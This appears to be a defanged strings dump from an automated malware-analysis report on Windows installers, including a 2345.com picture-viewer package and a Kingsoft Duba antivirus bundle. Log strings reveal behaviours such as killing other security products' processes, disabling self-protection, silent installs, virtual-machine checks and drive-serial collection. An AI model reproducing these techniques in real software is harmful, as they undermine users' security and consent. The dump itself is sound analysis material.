mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

VVV.dywt.com.cn

Service Pack %d

Windows 2003

Windows XP

Windows 2000

Windows NT

Windows ??

Windows Millenium Edition

Windows 98 Second Edition

Windows 98 SP1

Windows 98

Windows 95 OSR2

Windows 95 SP1

Windows 95

Windows CE

Microsoft Windows Me

Microsoft Windows 98

Microsoft Windows 95

Windows Server 2008 R2

Windows 7

Windows Server 2008

Windows Vista

Microsoft Windows 2003

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows NT

KERNEL32.DLL

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

GetWindowsDirectoryA

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

ShellExecuteA

GetKeyboardLayout

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

CreateDialogIndirectParamA

.text

`.rdata

@.data

.rsrc

(*.*)

2345pic_k1252705.exe_1360:

.text

`.rdata

@.data

.ndata

.rsrc

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

 uo.HU

:U-Rw}

?:,.tR

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

.Class 3 Public Primary Certification Authority0

<VeriSign Class 3 Public Primary Certification Authority - G50

hXXp://crl.verisign.com/pca3.crl0

hXXps://VVV.verisign.com/cps0

#hXXp://logo.verisign.com/vslogo.gif04

hXXp://ocsp.verisign.com0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<

 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

2345.com1>0<

2345.com0

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

hXXps://VVV.verisign.com/cps0*

#hXXp://crl.verisign.com/pca3-g5.crl04

pic.2345.com0

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

*?|<>/":

adm\LOCALS~1\Temp\nss3.tmp\RCWidgetPlugin.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss3.tmp\RCWidgetPlugin.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss3.tmp

nss3.tmp

s3.tmp

\dream\2345pic_k1252705.exe -s1

D:\dream\2345pic_k1252705.exe -s1

%Program Files%\2345Soft\2345Pic

D:\dream

2345pic_k1252705.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

D:\dream\2345pic_k1252705.exe

-1928723989

Windows 5.1(Service Pack 3)

2345.com

6.1.1.7158

(c) 2016 2345.com

svchost.exe_220:

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

RPCRT4.dll

NETAPI32.dll

ole32.dll

ntdll.dll

RegCloseKey

RegOpenKeyExW

GetProcessHeap

NtOpenKey

svchost.pdb

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

Windows

Operating System

5.1.2600.5512

duba_u20862342_sv1_3_18.exe_632:

`.rsrc

u%SSSWSSSh

</td<\t`<.ud

9.Wt$9n

u`SSh

8%uAP3

t$SSh

PSSSSSSh

aSSSh

.VVVVVSRSSj

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

t.Jt Jt

8.tmpu

kernel32.dll

gdiplus.dll

.mixcrt

KERNEL32.DLL

mscoree.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

WS2_32.dll

%s:%d

WARNING: failed to save cookies in %s

About to connect() to %s%s port %ld (#%ld)

Connected to %s (%s) port %ld (#%ld)

IDN support not present, can't parse Unicode (UTF-8) domains

Protocol %s not supported or disabled in libcurl

<url> malformed

:]://%[^

[^:]:%[^

http_proxy

%5[^:@]:%5[^@]

:%5[^@]

Port number too large: %lu

%s://%s%s%s:%hu%s%s%s

;type=%c

[%*45[0123456789abcdefABCDEF:.]%c

Couldn't find host %s in the _netrc file; using defaults

[email protected]

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

User-Agent: %s

Re-using existing connection! (#%ld) with host %s

%s://%s

Connection #%ld to host %s left intact

operation aborted by callback

ioctl callback returned error %d

the ioctl callback returned %d

seek callback returned error %d

Received problem %d in the chunky parser

HTTP server doesn't seem to support byte ranges. Cannot resume.

Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld

Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)

Operation timed out after %ld milliseconds with %lld bytes received

Operation timed out after %ld milliseconds with %lld out of %lld bytes received

Added %s:%d:%s to DNS cache

Resolve %s found illegal!

%5[^:]:%d:%5s

No URL set!

[^?&/:]://%c

Violate RFC 2616/10.3.2 and switch from POST to GET

Violate RFC 2616/10.3.3 and switch from POST to GET

Disables POST, goes with %s

Issue another request to this URL: '%s'

unspecified error %d

%s cookie %s="%s" for domain %s, path %s, expire %lld

#HttpOnly_

httponly

I99[^;

skipped cookie with bad tailmatch domain: %s

skipped cookie with illegal dotcount domain: %s

23[^;=]=I99[^;

%s%s%s

# Fatal libcurl error

# Netscape HTTP Cookie File

# hXXp://curl.haxx.se/rfc/cookie_spec.html

# This file was generated by libcurl! Edit at your own risk.

[%s %s %s]

Send failure: %s

Recv failure: %s

bind failed with errno %d: %s

Local port: %hu

getsockname() failed with errno %d: %s

Bind to local port %hu failed, trying next

Couldn't bind to '%s'

Name '%s' family %i resolved to '%s' family %i

Local Interface %s is ip %s using address family %i

ssloc inet_ntop() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

getpeername() failed with errno %d: %s

TCP_NODELAY set

Could not set TCP_NODELAY: %s

Failed to connect to %s: %s

Trying %s...

sa_addr inet_ntop() failed with errno %d: %s

%d.%d.%d.%d

Could not resolve host: %s; %s

Could not resolve proxy: %s; %s

getaddrinfo() failed for %s:%d; %s

init_resolve_thread() failed for %s; %s

%sAuthorization: Basic %s

%s:%s

%s auth using %s with user '%s'

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %d

If-Unmodified-Since: %s

Last-Modified: %s

If-Modified-Since: %s

%s, d %s M d:d:d GMT

Failed sending HTTP POST request

Content-Type: application/x-www-form-urlencoded

Internal HTTP POST error!

Failed sending HTTP request

%s%s=%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s

PTF://%s:%s@%s

Content-Range: bytes %s/%lld

Content-Range: bytes %s%lld/%lld

Range: bytes=%s

PTF://

Host: %s%s%s:%hu

Host: %s%s%s

Chunky upload is not supported by HTTP 1.0

Accept-Encoding: %s

Referer: %s

HTTP/1.0 connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 proxy connection set to keep alive!

HTTP 1.0, assume close after body

RTSP/%d.%d =

HTTP =

HTTP/%d.%d =

Received HTTP code %d from proxy after CONNECT

HTTP/1.%d %d

CONNECT %s:%hu HTTP/%s

%s%s%s%s

Host: %s

%s:%hu

Establish HTTP proxy tunnel to %s:%hu

Internal error removing splay node = %d

Internal error clearing splay node = %d

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

Failed to resolve "%s" for SOCKS4 connect.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

SOCKS5 GSSAPI per-message authentication is not supported.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Failed to resolve "%s" for SOCKS5 connect.

User was rejected by the SOCKS5 server (%d %d).

--:--:--

%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s

password

login

Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds

Unable to parse FTP file list

Error in the SSH layer

Caller must register CURLOPT_CONV_ callback options

TFTP: No such user

TFTP: Unknown transfer ID

TFTP: Illegal operation

TFTP: Access Violation

TFTP: File Not Found

Login denied

Issuer check against peer certificate failed

Invalid LDAP URL

Unrecognized HTTP Content-Encoding

Problem with the SSL CA cert (path? access rights?)

Peer certificate cannot be authenticated with known CA certificates

Problem with the local SSL certificate

SSL peer certificate or SSH remote key was not OK

A libcurl function was given a bad argument

Operation was aborted by an application callback

FTP: command REST failed

FTP: command PORT failed

HTTP response code said error

FTP: couldn't retrieve (RETR failed) the specified file

FTP: couldn't set file type

FTP: can't figure out the host in the PASV response

FTP: unknown 227 response format

FTP: unknown PASV reply

FTP: unknown PASS reply

FTP: The server did not accept the PRET command.

FTP: weird server reply

URL using bad/illegal format or missing URL

Unsupported protocol

Winsock version not supported

Protocol family not supported

Address family not supported

Operation not supported

Socket is unsupported

Protocol is unsupported

Protocol option is unsupported

Unknown error %d (%#x)

d:d

d:d:d

0123456789

%c%c==

%c%c%c=

%c%c%c%c

.jpeg

.html

--%s--

couldn't open file "%s"

Content-Type: %s

; filename="%s"

Content-Disposition: attachment; filename="%s"

Content-Type: multipart/mixed, boundary=%s

%s; boundary=%s

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

g_Install.Init ...

g_Install.Init return:%d

DbgExtraceAllFiles return:%d

import file install need reboot

g_Install.StartLoadPacketData

not support cover install in silent mode

the old kav version not support cover install

ProcessOldProduct RunApp return:%d, file:%ws, cmd:%ws

RunAutofix RunApp return:%d

KApp::GetSilentFlag return %d silent:%d

KApp::VersionVerification return %d silent:%d

0,0,-0,%d

0,-%d,-0,-0

extern_alpha_key

crtext

headacceptlbtndownmsg

0,0,-0,-0

Kxehost OpenEvent return:%d, error:%d

kill kxetray, failcount:%d, killcount:%d

kill kxetray 2, failcount:%d, killcount:%d

StopKxetray return:%d

StopService return:%d

KFunction::KillProcessByPath failcount:%d, killcount:%d

Wait all progress exit, count:%d

Kill services retrun:%d

StopService WaitServiceExit return:%d

StopService WaitServiceExit1 return:%d

ClearBCDriver delete reg return:%d

DeleteFile return:%d, error:%d, path:%ws

KInsall::Is360AvInstalled download fail, file:%ws, nStatus:%d

6AES part of OpenSSL 0.9.8c 05 Sep 2006

User-Agent: Mozilla/4.0

Authorization: NTLM %s

Proxy-Authorization: NTLM %s

%s:xx

# Block type: 2:%x 3:%x

# DPMS capabilities: Active off:%s Suspend:%s Standby:%s

%d,%d

\\.\PhysicalDrive%d

%d ReadPhysicalDriveInNTWithAdminRights ERROR

DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d

\\.\IDE21201.VXD

\\.\Scsi%d:

Drive%dModelNumber

Drive%dSerialNumber

DriveÜontrollerRevisionNumber

DriveÜontrollerBufferSize

Drive%dType

VBoxHook.dll

\\.\VBoxMiniRdrDN

SELECT * FROM Win32_OperatingSystem WHERE (InstallDate IS NOT NULL)

lXXxXXXXXXXX

XX

xxxxxxxx

KFunction::RunApp CreateProcessW error:%d, wait:%d, show:%d, path:%ws, cmd:%ws

IsProcessRunningByDirectory CreateFile return:%d, error:%d, path:%ws

KillProcessByPath CreateToolhelp32Snapshot, error:%d

%ws:%d

KillProcessByPath OpenProcess fail, process:%ws, error:%d

Terminate Process return:%d, error:%d, pid:%d, path:%ws

StopProcessByPid pid:%d return fase

KillProcessByPid TerminateProcess return:%d, error:%d, pid:%d

KillProcessByCmd taskkill.exe %ws pid:%d return:%d, exitcode:%d, GetLastError:%d

KillProcessByPathkxescore CreateToolhelp32Snapshot, error:%d

KillProcessByPathkxescore OpenProcess fail, process:%ws, error:%d, pid:%d

AddPid1 return:%d

AddPid1:%d

AddPid2 return:%d

AddPid2:%d

StopOldSelfProtect:%d

SFP return:%d

StopSelfProtect:%d

OLDSFP return:%d

KInsall::LenoveOem return:%d

DeleteUUIDex RecurseDeleteKey :%d

DeleteFile hg.dat return:%d

SetServicesInfo return:%d

CreateShellLink return:%d, file:%ws, cmd:%ws, link:%ws

TerminateProc pid: %d reutrn:%d :dwExitCode: %d

KInstallDetect::IsInstallDuba() return:%d

error_msg

bUrlMon

CmdLine

KGetSilentFlag::GetSilentFlag return %d silentflag:%d

KImportFileInstaller::ReleaseFile---begin...

KImportFileInstaller::ReleaseFile---GetPrivateProfileString failed,strKey = %s

KImportFileInstaller::ReleaseFile---Rename failed, %s

KImportFileInstaller::ReleaseFile---end...

KImportFileInstaller::_DisableIntercept---Result = %d

load product.xml fail

found installed product, version:%ws, cover:%d, path:%ws

version:%ws, cover:%d

KInsall::IsInstalledKav return:%d

RunApp Register return:%d

KInsall::Register return:%d

GetDebugPrivilege return:%d GetLassError return:%d

cover:%d, kxescore:%d

StopAllProgress return:%d

ClearWebShield...

ClearWebShield return:%d

install end, return:%d, install cost time:%dms

install thread end:%d

KInsall::ParseConfig return:%d

AutoRunkav:%d _ Deleteuuid:%d_lockstartpage:%d

KInsall::ParseKSafe path:%ws, cmd:%ws, wait:%d, show:%d

KInsall::ParsePCMgr path:%ws, cmd:%ws, wait:%d, show:%d

ParsePCMgr return:%d

KInsall::ParseLaunch path:%ws, cmd:%ws, wait:%d, show:%d

ParseLaunch return:%d

KInsall::ParseRecommend url:%ws

KSetupWiz::RunClear return:%d

KSetupWiz::RunInstall return:%d

install ksafe return:%d

install pcmgr return:%d

IsInstallSuitPacket return:%d

ClearInvalidDrivers return:%d, error:%d, path:%ws

silent mode detect3 loadUrl return:%d

KInsall::Is360AvInstalled return:%d

FileName:%ws,param:%ws,waittime:%d bshow:%d

KInsall::FixRegError TestIsVolatieKey(kingsoft) return %d, error:%d

KInsall::FixRegError BackKey(kingsoft) return %d, error:%d

KInsall::FixRegError ImportKey(kingsoft) return %d, error:%d

KInsall::ParseTidWhiteList tid1:%d, tid2:%d

KInsall::ParseTidWhiteList return:%d

KInsall::IsInTidWhiteList return:%d

LoadProductPacket CreateThread return:%d

ExtractMemoryFiles return:%d

ExtractPacket return:%d

GetPacketData %d

GetPacketData return:%d

Extract return:%d

LoadImageToMem CreateFile error:%d, path:%ws

CreateFileByMem CreateFileMapping error:%d, path:%ws

CreateFileByMem MapViewOfFile error:%d, path:%ws

{9B8A9862-3FE6-452e-A096-31E845BF839B}

Uncompress return:%d

KSearch::Search product count:%d

KSearch::Search return:%d

KSearch::ParseConfig return:%d

KSearch::ReadRegPath wrong root key

KSearch::ReadRegPath Open key fail

KSearch::ReadRegPath Read key fail

ReadRegPath return:%d, root:%ws, path:%ws, name:%ws

IsFileListExist return not exist, error:%d, path:%ws

g_App.Run...

g_App.Run return:%d

GetExportInterface

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

KFixAV DeleteSubKeyTree %ws return:%d

FilterBlack() DeleteSubKeyTree %ws %ws

FixPolicies return:%d

%d-%d-%d d:d:d d

particle%d

notifymsg

SendHttpRequestEx

bubble%d

OnInstallProgress nProgress:%d, m_nProgressCount:%d

137,269,199,285

62,269,124,285

22,9,262,24

KUninstall360Dlg::CallInfoc reported:%s %s

KUninstall360GuideDlg::ReportInfo reported:%s %s

lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt

MoveFileEx Rename file fail, error:%d

CreateFile:%d

CreateFileByMem CreateFile error:%d, path:%ws

CreateFileMapping:%d

MapViewOfFile:%d

ChecksumFileByMem return%d, path:%ws

ChecksumFileByMem CreateFile error:%d, path:%ws

ChecksumFileByMem CreateFileMapping error:%d, path:%ws

ChecksumFileByMem MapViewOfFile error:%d, path:%ws

ReportV2 ...

ReportV2 end

ReportOtherInfo ...

ReportOtherInfo end

ReportLiebaoRcmd ...

ReportLiebaoRcmd end

ReportImportFileInstall ...

ReportImportFileInstall end

ReportV2BJ ...

ReportV2BJ end

ReportParentProcessInfo ...

ReportParentProcessInfo end

DeleteSubKeyTree root:%d, path:%ws

DeleteSubKeyTree return:%d

KExecReg Run Return:%d, delete:%d, root:0x%x, path:%ws, type:%d, name:%ws, value:%ws

KExecProcess Run, path:%ws, cmd:%ws, time:%d, show:%d

KExecProcessRun return:%d

KExecService Run operation:%d

KxEInstallService return:%d, path:%ws

KxEUninstallService return:%d, name:%ws

KxEStartService return:%d, name:%ws

KxEStopService return:%d, name:%ws

KExecService Run return:%d

KExecFile DeleteFile return:%d, error:%d, path:%ws

KExecLink DeleteFolder return:%d, path:%ws

KExecLink DeleteFile return:%d, error:%d, path:%ws

KExecLink CreateLink return:%d, file:%ws, cmd:%ws, link:%ws

CreateExecReg fail

CreateExecService fail

CreateExecProcess fail

CreateExecLink fail

KInstaller::ParseInstall return:%d

KInstaller::ParseCoverInstall return:%d

KInstaller::Install return:%d

KInstaller::Start return:%d

KInstaller::CoverInstall return:%d

ModifyFolderIcon _tfopen fail, error:%d

CreateExecFile fail

KClear::Clean return:%d

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpReadData

WinHttpCloseHandle

WinHttpCrackUrl

WinHttpSetOption

WinHttpSetTimeouts

FindAV2012:%d

C:\drv.pdb

%s\Connection

e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kpacket.pdb

GdiplusShutdown

zcÁ

.?AV?$CWindowImpl@VKNewMsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@

.?AV?$CBkDialogImpl@VKNewMsgbox@@VCBkDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@

.?AVKNewMsgbox@@

.?AV?$KxEIPCClientT@VIKxEServiceMgr@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEServiceMgr@@@@

.?AV?$KxEIPCClientT@VIKxEDefendEngineSP_old@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEDefendEngineSP_old@@@@

.?AV?$KxEIPCClientT@VIKxEDefendEngineTrustSP@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEDefendEngineTrustSP@@@@

.?AV?$KxEIPCClientT@VIKxEDefendEngineSP@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEDefendEngineSP@@@@

.?AV?$CAtlHttpClientT@VZEvtSyncSocket@ATL@@@ATL@@

.?AVKInstallStageReport@KDubaPacket@@

.?AVCKANRegisterKey@@

.?AVKWriteHttpFile@@

.?AV?$CWindowImpl@VCBkMsgWnd@@VCWindow@ATL@@V?$CWinTraits@$0GMPAAAA@$0EABAA@@3@@ATL@@

.?AVCBkMsgWnd@@

.?AVIProcessMsgBack@@

.?AVCBkWindowScollBar@@

.?AUICryptoSetPassword@@

.?AVCCryptoGetTextPassword@N7z@NArchive@@

.?AUICryptoGetTextPassword@@

.?AVKImportFileInstallBlock@KDubaPacket@@

.?AVKExecLink@@

.?AVKExecFile@@

.?AVKExecService@@

.?AVKExecProcess@@

.?AVKExecReg@@

.?AVIExec@@

.?AVKWriteMemHttpFile@@

.?AVKUnionInfocReporter@anti_cheat@@

|:S.ww

0eW`%f

%Xr01

4.vsX\

r.dwpt

%x@!X

#iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:EC4A6183640111E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:EC4A6184640111E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EC4A6181640111E4A977D70A3884CC43" stRef:documentID="xmp.did:EC4A6182640111E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:23845831640211E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:23845832640211E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2384582F640211E4A977D70A3884CC43" stRef:documentID="xmp.did:23845830640211E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>4o

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:1E4476C4640211E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:1E4476C5640211E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E4476C2640211E4A977D70A3884CC43" stRef:documentID="xmp.did:1E4476C3640211E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>9S/

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:1E4476C0640211E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:1E4476C1640211E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E4476BE640211E4A977D70A3884CC43" stRef:documentID="xmp.did:1E4476BF640211E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:EC4A6187640111E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:EC4A6188640111E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EC4A6185640111E4A977D70A3884CC43" stRef:documentID="xmp.did:EC4A6186640111E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

<class name="linktext" font="0002" hoverfont="0002" crtext="0033ff" crhover="0066ff" cursor="hand"/>

<class name="cmn_link_2013" crtext="047ecb" crhover="10e6ff" cursor="hand"/>

<!--<class name="menubody" skin="menubody" font="0000" crtext="000000" crbg="FBFCFD" /> -->

<class name="linktext2" hoverfont="0002" crtext="0033ff" crhover="0066ff" cursor="hand"/>

<!-- <class name="normal_path" textmode="4000" font="0000" crtext="ffffff" />-->

<class name="setup_path" textmode="4000" font="0002" hoverfont="0002" crtext="047ecb" crhover="10e6ff" cursor="hand" />

<class name="linktext3" crtext="0070c0" crhover="00b0f0" cursor="hand"/>

<!-- <class name="msgboxhead" skin="msgboxhead" font="0000" crtext="000000" crbg="FBFCFD"/>

<class name="msgboxbody" skin="msgboxbody" font="0000" crtext="000000"/>

<class name="cmn_text_title" font="0004" crtext="FFFFFF"/>

<class name="text_link" font="0002" crtext="0f6ec0" hoverfont="0002" crhover="60cafc" cursor="hand"/>

<class name="text_link_big" font="0102" crtext="0f6ec0" hoverfont="0102" crhover="60cafc" cursor="hand"/>

<class name="common_btn" skin="common_btn" font="0000" crtext="000000" textmode="25" cursor="hand"/>

<class name="big_top_textmode" font="0604" crtext="FBFCFD" />

<class name="cmn_dlg_header" skin="cmn_dlg_header" font="0000" crtext="000000"/>

<class name="cmn_dlg_body" skin="cmn_dlg_body" font="0000" crtext="000000" x-margin="4" />

<class name="cmn_dlg_footer" skin="cmn_dlg_footer" font="0000" crtext="000000" x-margin="4" />

<class name="cmn_head_text_title" font="0004" crtext="FDFDFD"/>

